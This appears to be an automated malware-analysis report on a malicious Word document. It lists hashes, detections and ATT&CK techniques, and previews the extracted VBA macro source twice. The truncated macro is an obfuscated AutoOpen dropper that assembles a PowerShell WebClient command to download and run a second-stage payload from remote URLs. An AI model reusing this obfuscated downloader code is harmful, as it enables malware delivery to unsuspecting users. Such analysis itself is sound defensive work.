Office (OLE) malware analysis — malicious · 8dff8c055205be8c

MALICIOUS

Office (OLE)

145.0 KB Created: 2018-02-12 11:48:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: d95501350cce35a8e2bf8021f82dd4c0 SHA-1: 969c1d32466e588302088f71ec6366797e0451d7 SHA-256: 8dff8c055205be8ccca6fc48d21084cc56f54bbfde1050722f8320030fb23d6c

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macro constructs a URL using string concatenation and attempts to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6446843-0' further supports the malicious nature of the file.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6446843-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6446843-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://bQTb+QTbeQTb+QoUz+oUzTbrQTb+ In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32532 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	32532 bytes
SHA-256: `2ba31dd68b45d4713d0ec78a247bcb6c0b651c2c03cae1e29a80494de40cb11e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "qoADusjTtFpdk" Sub AutoOpen() On Error Resume Next jPMRbMdKz = jnnsVtXuws - Sgn(AOGvH) - (7645120 - Tan(182224) / 4790621 - ChrW(iJS)) NEcDpuwzS = TQOGiCXitIJSi - Sgn(GWU) - (4796194 - Tan(5429981) / 7283521 - ChrW(CaVaotqhzAurI)) upjAFwBUl = IuV - Sgn(zSaZUjzRq) - (8538150 - Tan(6255245) / 8885620 - ChrW(jAtIP)) Application.Run "kOpQIqQC", fSiiOikNunmDho aaGQqTTdj = QaNfSRtP - Sgn(aaLKczoU) - (2181057 - Tan(7937659) / 4104416 - ChrW(rrtTvVj)) cGFrwXAPi = bsn - Sgn(TipPPdQBzIo) - (2816989 - Tan(1208555) / 4810478 - ChrW(UMXvMnTUiOm)) cjJTjzhiY = EEfsQ - Sgn(GzCiRbjKo) - (872550 - Tan(9403956) / 5217555 - ChrW(ANGBdBhrjYrjXA)) End Sub Function fSiiOikNunmDho() On Error Resume Next JnjJZzGKOZ = CEOUSSqZOnsKM - Sgn(MjXB) - (756874 - Tan(100542) / 615485 - ChrW(rwbFEjmGmmS)) TanMXf = SvMJk - Sgn(zMWomE) - (3702965 - Tan(2108868) / 7683984 - ChrW(ENhWqQ)) rzRfXqVB = PtNNKm - Sgn(AGrA) - (7447879 - Tan(3142264) / 4327133 - ChrW(RnBqQC)) owWTDDBMv = YpFVAbi + Mid(ipm + "jiuOn+uOn'+'+QTb6Y/?QTb+QoUz+oUzTbhtQTb+QTbtpsQTb+QoUz+oUzTb:/QTboUz+oUz+Q'+'Tb/s'+'porQTb+QTbtshuOn+uOnQTb+QTbub.ouQTb+Q'+'TbtcoQTb+QuOn+uOnTbmQTb+QTbe.liQTb+QTbfQTb+QTbe/QTb+QTbr3QTb+QTbADQTb+hYjCCUvMOVIlwlZwwzcFcpX" + bfPfQAwbOlW, 3, 192) uktIqawX = DVaTR - Sgn(GbBvfk) - (6539084 - Tan(4871861) / 9444484 - ChrW(lMQCPfLTVUiLd)) hjujAIbPZo = cUCXu - Sgn(wiXKHLfRmopTt) - (406108 - Tan(1585185) / 1545274 - ChrW(zvXKGwzkuwq)) oLMbdSTqPiT = KhKfCzD - Sgn(FuDAuhhfLRbC) - (3880159 - Tan(6973945) / 1006256 - ChrW(WkpkaaMMo)) IHlMbiwhfwa = XmtsXCZE + Mid(VCizQXCoaNnjMS + "kdwwIYwAXCpqVzVItnz,[ChAR]124'+')9ry&'+'( C2LenV:pUbLiCHjqmzJQwlIUNnzfDLDYV" + XsqvtUAz, 19, 37) NjYbTCr = MvFaAXaWzBFC - Sgn(AVQTIBjpAzB) - (5948641 - Tan(9280903) / 6105738 - ChrW(zlCAUBJTU)) ETXItM = RBCBqwVZzHwr - Sgn(HdwBMwDvDrAYLw) - (891954 - Tan(6582933) / 6478414 - ChrW(BvdqzjnJCfFw)) BMdrEuIwPM = dGmvWVAz - Sgn(QuNKCdfw) - (3261085 - Tan(8312827) / 3400481 - ChrW(vvVQdRN)) mnrRt = bGforFESfCsWPZ + Mid(RZdXow + "QbdlrrBZUYICTb+QTbhtQoU'+'z+oUzTb+QTbtQTb+QTbpQTb+QTbs:QTb+QTb/QTbzEphzdslPdCbz" + ciIRHSPii, 13, 54) juALl = LQitDmudsEG - Sgn(fMGujikYRQno) - (7807005 - Tan(7515616) / 625150 - ChrW(oJbbNnFI)) UzLdkQCWw = oJuwzmiV - Sgn(zwXKfjuhRvdqEQ) - (6873144 - Tan(4165108) / 7871764 - ChrW(cfdrGwVuVqa)) MFHJBQ = dISpnEB - Sgn(ishfWKiijs) - (2005049 - Tan(5507829) / 2061513 - ChrW(BqV)) VFnIPsQZVT = tYqGTWR + Mid(DhMhsdfi + "A+oUz+QTb3q+r3QTb+QTbqQTb+QTb-objQTb+QTbeQTb+QTbctQTb+QTbrQTbuOn+uOn+QTb3QTb+QTbq) SystQTb+QTbem.QTb+QTbNetQ'+'Tb+QTb.uOn+uoUz+oUzO'+'nQTb+QTbWebClienuOn+uOnjrilUCiqz" + piKiEOOfG, 2, 156) BlwEaOBQiov = TmKcfzHZHbUjM - Sgn(qtdcXXsKK) - (4107959 - Tan(3085597) / 6087441 - ChrW(AzRs)) btiGqIGQ = lwGBZlYK - Sgn(sNwtwRsTLGVZw) - (498920 - Tan(1787985) / 5409902 - ChrW(MApGaqizuQVo)) IpIqEi = rENfAwO - Sgn(UNPjoKXzn) - (8876318 - Tan(9395271) / 4909466 - ChrW(ZYUlSXNwBBX)) HfWJFJfbOm = sZokOEHz + Mid(UXOciUK + "sCbtBUKNCOYmrVA[cHAR]81+[cuOn+uOnHAR]65),[cHAR]36) 7hG& ( bSIeNv:'+'cOMspec[4,15,25]-jOinQTbQTboUz+oUz)uOn).repLoUz+oUzaCe(([cHar]81+['+'cHa'+'r]84+[rVPmOijRPujrXvjWwj" + kwzV, 16, 134) jadqwjI = BiSLsBwu - Sgn(lUsk) - (2288026 - Tan(4248278) / 6266651 - ChrW(uMjqBwujwQH)) jkIBXEi = kTZTmMjZahXplE - Sgn(ldoDNm) - (8989700 - Tan(9662570) / 6428418 - ChrW(izi)) RILIHqIti = fulpwVSv - Sgn(zzmGKNoq) - (1073325 - Tan(9450290) / 6585352 - ChrW(CKMtK)) dkTQzMVVHRd = rPQMTCMNOsm + Mid(ZmjLzGVY + "YRjkXdAo&( $PSHomE[21]+$pshoMe[30]+'x') (('((oUz(uOn((QToUz+oUzbCQAnuOn+uO'+'nsaQToUz+oUzb+QTbd'+'asuXXhJbisRSj" + jSjtti, 9, 93) usjPRMBQA = lEPaCrSOlSw - Sgn(ITiFkwG) - (5223339 - Tan(2163525) / 243537 - ChrW(RDNEwCwnwwR)) wwSUf = aUKrUKnNwjRP - Sgn(JaNEARakR) - (9482514 - Tan(4395911) / 7858270 - ChrW(TLnfwUriEkZ)) rfttD = mQXn - Sgn(lmzbpcljwjqE ... (truncated)

SHA-256: 2ba31dd68b45d4713d0ec78a247bcb6c0b651c2c03cae1e29a80494de40cb11e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "qoADusjTtFpdk"
Sub AutoOpen()
On Error Resume Next
jPMRbMdKz = jnnsVtXuws - Sgn(AOGvH) - (7645120 - Tan(182224) / 4790621 - ChrW(iJS))
NEcDpuwzS = TQOGiCXitIJSi - Sgn(GWU) - (4796194 - Tan(5429981) / 7283521 - ChrW(CaVaotqhzAurI))
upjAFwBUl = IuV - Sgn(zSaZUjzRq) - (8538150 - Tan(6255245) / 8885620 - ChrW(jAtIP))
Application.Run "kOpQIqQC", fSiiOikNunmDho
aaGQqTTdj = QaNfSRtP - Sgn(aaLKczoU) - (2181057 - Tan(7937659) / 4104416 - ChrW(rrtTvVj))
cGFrwXAPi = bsn - Sgn(TipPPdQBzIo) - (2816989 - Tan(1208555) / 4810478 - ChrW(UMXvMnTUiOm))
cjJTjzhiY = EEfsQ - Sgn(GzCiRbjKo) - (872550 - Tan(9403956) / 5217555 - ChrW(ANGBdBhrjYrjXA))
End Sub
Function fSiiOikNunmDho()
On Error Resume Next
JnjJZzGKOZ = CEOUSSqZOnsKM - Sgn(MjXB) - (756874 - Tan(100542) / 615485 - ChrW(rwbFEjmGmmS))
TanMXf = SvMJk - Sgn(zMWomE) - (3702965 - Tan(2108868) / 7683984 - ChrW(ENhWqQ))
rzRfXqVB = PtNNKm - Sgn(AGrA) - (7447879 - Tan(3142264) / 4327133 - ChrW(RnBqQC))
owWTDDBMv = YpFVAbi + Mid(ipm + "jiuOn+uOn'+'+QTb6Y/?QTb+QoUz+oUzTbhtQTb+QTbtpsQTb+QoUz+oUzTb:/QTboUz+oUz+Q'+'Tb/s'+'porQTb+QTbtshuOn+uOnQTb+QTbub.ouQTb+Q'+'TbtcoQTb+QuOn+uOnTbmQTb+QTbe.liQTb+QTbfQTb+QTbe/QTb+QTbr3QTb+QTbADQTb+hYjCCUvMOVIlwlZwwzcFcpX" + bfPfQAwbOlW, 3, 192)
uktIqawX = DVaTR - Sgn(GbBvfk) - (6539084 - Tan(4871861) / 9444484 - ChrW(lMQCPfLTVUiLd))
hjujAIbPZo = cUCXu - Sgn(wiXKHLfRmopTt) - (406108 - Tan(1585185) / 1545274 - ChrW(zvXKGwzkuwq))
oLMbdSTqPiT = KhKfCzD - Sgn(FuDAuhhfLRbC) - (3880159 - Tan(6973945) / 1006256 - ChrW(WkpkaaMMo))
IHlMbiwhfwa = XmtsXCZE + Mid(VCizQXCoaNnjMS + "kdwwIYwAXCpqVzVItnz,[ChAR]124'+')9ry&'+'( C2LenV:pUbLiCHjqmzJQwlIUNnzfDLDYV" + XsqvtUAz, 19, 37)
NjYbTCr = MvFaAXaWzBFC - Sgn(AVQTIBjpAzB) - (5948641 - Tan(9280903) / 6105738 - ChrW(zlCAUBJTU))
ETXItM = RBCBqwVZzHwr - Sgn(HdwBMwDvDrAYLw) - (891954 - Tan(6582933) / 6478414 - ChrW(BvdqzjnJCfFw))
BMdrEuIwPM = dGmvWVAz - Sgn(QuNKCdfw) - (3261085 - Tan(8312827) / 3400481 - ChrW(vvVQdRN))
mnrRt = bGforFESfCsWPZ + Mid(RZdXow + "QbdlrrBZUYICTb+QTbhtQoU'+'z+oUzTb+QTbtQTb+QTbpQTb+QTbs:QTb+QTb/QTbzEphzdslPdCbz" + ciIRHSPii, 13, 54)
juALl = LQitDmudsEG - Sgn(fMGujikYRQno) - (7807005 - Tan(7515616) / 625150 - ChrW(oJbbNnFI))
UzLdkQCWw = oJuwzmiV - Sgn(zwXKfjuhRvdqEQ) - (6873144 - Tan(4165108) / 7871764 - ChrW(cfdrGwVuVqa))
MFHJBQ = dISpnEB - Sgn(ishfWKiijs) - (2005049 - Tan(5507829) / 2061513 - ChrW(BqV))
VFnIPsQZVT = tYqGTWR + Mid(DhMhsdfi + "A+oUz+QTb3q+r3QTb+QTbqQTb+QTb-objQTb+QTbeQTb+QTbctQTb+QTbrQTbuOn+uOn+QTb3QTb+QTbq) SystQTb+QTbem.QTb+QTbNetQ'+'Tb+QTb.uOn+uoUz+oUzO'+'nQTb+QTbWebClienuOn+uOnjrilUCiqz" + piKiEOOfG, 2, 156)
BlwEaOBQiov = TmKcfzHZHbUjM - Sgn(qtdcXXsKK) - (4107959 - Tan(3085597) / 6087441 - ChrW(AzRs))
btiGqIGQ = lwGBZlYK - Sgn(sNwtwRsTLGVZw) - (498920 - Tan(1787985) / 5409902 - ChrW(MApGaqizuQVo))
IpIqEi = rENfAwO - Sgn(UNPjoKXzn) - (8876318 - Tan(9395271) / 4909466 - ChrW(ZYUlSXNwBBX))
HfWJFJfbOm = sZokOEHz + Mid(UXOciUK + "sCbtBUKNCOYmrVA[cHAR]81+[cuOn+uOnHAR]65),[cHAR]36) 7hG& ( bSIeNv:'+'cOMspec[4,15,25]-jOinQTbQTboUz+oUz)uOn).repLoUz+oUzaCe(([cHar]81+['+'cHa'+'r]84+[rVPmOijRPujrXvjWwj" + kwzV, 16, 134)
jadqwjI = BiSLsBwu - Sgn(lUsk) - (2288026 - Tan(4248278) / 6266651 - ChrW(uMjqBwujwQH))
jkIBXEi = kTZTmMjZahXplE - Sgn(ldoDNm) - (8989700 - Tan(9662570) / 6428418 - ChrW(izi))
RILIHqIti = fulpwVSv - Sgn(zzmGKNoq) - (1073325 - Tan(9450290) / 6585352 - ChrW(CKMtK))
dkTQzMVVHRd = rPQMTCMNOsm + Mid(ZmjLzGVY + "YRjkXdAo&( $PSHomE[21]+$pshoMe[30]+'x') (('((oUz(uOn((QToUz+oUzbCQAnuOn+uO'+'nsaQToUz+oUzb+QTbd'+'asuXXhJbisRSj" + jSjtti, 9, 93)
usjPRMBQA = lEPaCrSOlSw - Sgn(ITiFkwG) - (5223339 - Tan(2163525) / 243537 - ChrW(RDNEwCwnwwR))
wwSUf = aUKrUKnNwjRP - Sgn(JaNEARakR) - (9482514 - Tan(4395911) / 7858270 - ChrW(TLnfwUriEkZ))
rfttD = mQXn - Sgn(lmzbpcljwjqE
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.